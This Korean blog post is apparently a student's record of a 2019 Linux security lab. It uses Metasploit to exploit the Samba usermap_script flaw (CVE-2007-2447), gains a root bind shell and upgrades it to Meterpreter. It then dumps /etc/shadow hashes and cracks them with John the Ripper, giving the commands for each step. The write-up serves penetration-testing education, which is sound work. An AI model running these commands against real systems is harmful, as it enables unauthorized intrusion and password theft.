[모의해킹] John the Ripper를 활용한 패스워드 해시 크랙

! 이 포스트의 내용은 (2019년)  전공 강의에서 다룬 리눅스 보안 실습의 기록용이며, 이는 학습 목적으로만 사용되어야 합니다.

! 어떠한 경우에도 이러한 기술을 악용하거나 불법적인 활동에 사용해서는 안 됩니다.

 

! 모의 해킹과 관련된 실습은 합법적인 환경에서만 수행되어야 하며, 무단으로 다른 사람의 시스템에 접근하는 등의 행위는 법적인 문제로 이어질 수 있습니다. 이러한 기술을 사용할 때에는 항상 윤리적인 책임을 갖고 행동해야 합니다.

 

 

💡 취약점 정리

Samba는 리눅스/유닉스 시템에서 Windows와 파일 및 프린터 공유를 가능하게 해주는 서비스다.

Windows의 SMB(Server Message Block) 프로토콜을 구현한 오픈소스 소프트웨어를 말한다.

 

하지만 오래된 samba 버전은 여러 가지 취약점``cve``이 존재해서 공격자가 원격에서 명령을 실행하거나 루트 권한을 탈취 할 수 있다. 

 

📌 Samba usermap_script 취약점 개요 (CVE-2007-2447)

• 영향받는 소프트웨어: Samba 3.0.0 ~ 3.0.25rc3
• 취약점 유형: User-Supplied Data Command Injection
• 공격 난이도: 낮음 (익명 접근 가능)
• 공격 결과: 원격 코드 실행 (RCE)
• 공격 방식: ``username`` 필드를 조작하여 명령 실행

이 취약점은 Samba의 ``username map script`` 기능에서 발생하는 명령 주입(Command Injection) 문제로 인해 악용될 수 있다.

 

🔸공격 방식

• Samba의 ``username map script`` 옵션은 잘못된 방식으로 처리하는 문제를 악용해서 원격 코드 실행(RCE)을 수행할 수 있다.
• 즉, Samba 서버가 사용자 입력을 적절하게 검증하지 않아서 공격자가 명령어를 주입하여 원격에서 코드 실행이 가능하다.
• 성공하면 리눅스 쉘을 얻을 수 잇다.

🔸취약한 Samba 버전

• ``Samba 3.0.25rc3`` 이하 버전
• 기본적으로 리눅스 기반 서버에서 실행됨

NVD - CVE-2007-2447

---

1️⃣ 실습 환경 구성

🔹1. 네트워크 구조

• 공격자 (Attacker): Kali Linux
• 타겟 (Target): 취약한 Samba 서버

🔹2. 필수 도구 설치

• 공격 머신(Kali Linux)에서 필요한 툴:
  • Metasploit Framework  (``msfconsole``): 익스플로잇 실행을 위한 도구
  • John the Ripper (``john``): 패스워드 크랙 도구
• 타겟 머신(취약한 Samba 서버) 설정:
  • Samba 3.0.20 ~ 3.0.24 버전 설치
  • ``usermap_script`` 취약점이 존재하는 상태 유지

---

2️⃣ Metasploit을 활용한 Samba 취약점 익스플로잇

CVE-2007-2447 취약점은 Samba의 usermap_script 기능에서 발생하는 명령어 삽입 취약점이다.

즉, 공격자가 원격에서 명령어를 실행할 수 있는 취약점이기 때문에, 이를 활용하면 root 권한을 가진 쉘을 획득할 수 있다.

 

🔹1. Metasploit 실행

msfconsole

---

🔹2. 취약점 공격을 위한 설정

``exploit/multi/samba/usermap_scrip`` 모듈을 사용해서 Samba 취약점을 악용하여 usermap 스크립트를 통해 원격 코드를 실행한다.

use exploit/multi/samba/usermap_script
set payload cmd/unix/bind_ruby
set rhost <타겟 서버 IP>
exploit

• ``use exploit/multi/samba/usermap_script``: ``usermap_script`` 취약점을 이용한 익스플로잇 사용 설정
• ``payload cmd/unix/bind_ruby``: 타겟 시스템에 Ruby 쉘을 바인딩. 원격 명령어를 실행할 수 있도록 페이로드 설정
• ``rhost <타겟 서버 IP>``: 공격할 대상 서버의 IP를 지정

침투에 성공하면 Meterpreter 세션을 통해 시스템을 제어할 수 있다.

• ``whoami`` 입력을 통해 현재 root 계정 권한을 취득한 것을 확인 가능하다.

whoami

---

3️⃣ Meterpreter 세션 업그레이드

🔹1. 기존 쉘을 백그라운드로 전환

• 익스플로잇으로 획득한 cmd 쉘을 백그라운드로 전환
• ``Ctrl+Z`` 키를 눌러 현재 세션을 백그라운드로 전환

Ctrl + Z

• Metasploit 프롬프트에서 백그라운드로 전환됐는지 확인

sessions

• 현재 세션 ID 확인

---

🔹2. Shell을 Meterpreter로 변환

• ``Shell_to_meterpreter`` 모듈 실행
• 현재 활성화된 cmd 쉘을 Meterpreter로 변환하는 모듈 사용

use post/multi/manage/shell_to_meterpreter

• 옵션 설정 (set 명령어)
• ``SESSION 1`` > 기존 cmd 쉘을 변환할 세션 선택

set SESSION 1
exploit

• exploit 후 Meterpreter 세션이 성공적으로 열렸음

---

🔹3. Meterpreter 세션 활성화

• 현재 활성화된 Meterpreter 세션 확인

sessions -l

• Meterpreter 세션 (ID 2번)이 성공적으로 열림
• Meterpreter 실행

sessions 2

---

4️⃣ 리눅스 시스템 패스워드 해시 덤프

시스템에서 패스워드 해시를 추출하는 단계이다.

리눅스의 ``/etc/shadow`` 파일에 저장된 패스워드를 가져와서 크랙할 수 있다.

 

🔹1. 해시 덤프

``post/linux/gather/hashdump``는 Metasploit에서 리눅스 시스템의 해시 정보를 덤프하는 포스트-익스플로잇 모듈이다. 이 모듈은 공격자가 시스템에 접근한 후, 사용자 계정의 비밀번호 해시를 덤프하여 크랙하거나 추가적인 공격을 수행할 수 있도록 한다.

run post/linux/gather/hashdump

• ``run post/linux/gather/hashdump``: 대상 시스템에서 사용자 계정의 비밀번호 해시를 덤프한다.
  • 보통 ``hashdump``는 ``/etc/shadow`` 파일을 읽어 비밀번호 해시를 덤프하는 방식으로 동작한다.

• 하단의 Unshadowed Password File을 보면 ``/root/.msf4/loot/`` 경로에 파일이 저장된다.

---

5️⃣ John the Ripper로 패스워드 해시 크랙

🔹1. John the Ripper 시작

``john`` 명령어는 John the Ripper라는 비밀번호 크랙 도구를 사용해서, 덤프한 해시파일을 크랙하는데 사용된다.

• 덤프된 해시 파일을 ``john`` 명령어로 크래킹한다. 
• 이 명령어는 해당 해시 파일에 저장된 비밀번호를 크래킹하는 작업을 시작한다.
• 크래킹 진행상태는 화면에 표시되며, 비밀번호를 찾을 때까지 계속 시도된다.

john 20191030113208_default_192.168.255.149_linux.hashes_544817.txt

---

🔹2. 해시 파일 복사

``john`` 명령어로 비밀번호 크래킹을 시작하기 전에, 덤프된 해시 파일을 특정 위치로 복사해놓는 것이 좋다.

복사된 파일은 이후 크래킹 작업을 수행하는 데 사용된다.

cp ~/.msf4/loot/201903113208_default_192.168.255.149_linux.hashes_544817.txt /tmp/password.txt

• 덤프된 해시 파일을 ``/tmp/password.txt``로 복사하여, 다른 작업에 사용하도록 한다.

---

🔹3. John 실행

• ``john`` 툴을 사용하여, ``crypt`` 포맷으로 저장된 비밀번호 해시 파일을 크래킹한다.

john --format=crypt /tmp/password.txt

• ``john``: 비밀번호 해시 크래킹 도구인 John the Ripper를 실행하는 명령어
• ``--format=crypt``: ``john``에게 사용할 해시 포맷을 명시한다. 여기서 ``crypt``는 리눅스에서 기본적으로 사용되는 비밀번호 해시 알고리즘이다
• ``/tmp/password.txt``: 크래킹할 해시가 저장된 파일 경로

 

✔️ 사용할 수 있는 ``john`` 명령어 확인

 

✔️ 지원되는 해시 ``format`` 리스트 확인

• John the Ripper는 다양한 해시 포맷을 지원한다.
• ``john -list=formats`` 명령어를 사용하여 지원되는 포맷 목록을 확인할 수 있다.

---

🔹3. 크랙된 패스워드 확인

• ``john --show`` 명령어는 John the Ripper를 사용하여 비밀번호를 크래킹한 후 , 그 결과로 원래의 비밀번호를 출력하는 명령어이다.
• 이 명령어는 크래킹된 비밀번호를 확인할 때 사용된다.

john --show /tmp/password.txt

---

🔹4. 저장된 패스워드 확인

• 마지막으로 John the Ripper는 크래킹된 비밀번호를 ``.pot`` 파일에 저장한다.
• 이 파일을 열어 실제로 크래킹된 비밀번호를 확인할 수 있다.

cat /root/.john/john.pot

---